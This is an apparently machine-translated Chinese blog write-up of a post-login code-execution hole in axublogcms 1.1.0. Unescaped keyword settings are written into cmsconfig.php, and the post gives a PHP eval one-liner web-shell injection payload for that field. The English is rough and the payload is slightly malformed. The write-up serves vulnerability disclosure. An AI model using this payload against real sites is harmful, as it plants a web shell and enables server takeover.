axublogcms1.1.0 Latest Version Getshell
Code execution vulnerability
Now the latest version is 1.1.0 today to re-audit the next axublogcms1.0.6, found a loophole in the chicken, because not only 1.0.6 version exists, including the latest version is present.
Background write configuration file, directly can Getshell.
Download the latest version of the source code for installation, please see the previous written article (http://www.cnblogs.com/Oran9e/p/7846987.html)
Installation successful, login backstage.
Basic settings, because the input is not filtered, so you can write to the configuration file, and then code execution.
Look at the Code analysis
./ad/setconfig.php Line 97,102
The $webkeywords of the submitted parameters is replaced directly without any escaping behavior.
So here we can write a word. In line 97 see, Direct put. The/cmsconfig.php file is included, so the written word is written directly into the cmsconfig.php file.
Insert a sentence in the keyword, here need to close the front of the webkeywords, as well as closed double quotation marks, or the PHP file is not complete cause to run.
For example: 123456 "; @eval ($_post[' a '); $a ="
Take a look at this time. Write Status of/cmsconfig.php
Successfully written, next verify.
Source Link (Link: https://pan.baidu.com/s/1QML_lTny4h30n2mH4uKTeA password: di3b)
This article links (http://www.cnblogs.com/Oran9e/p/8981705.html), without permission prohibited reprint.
axublogcms1.1.0 Latest Version Getshell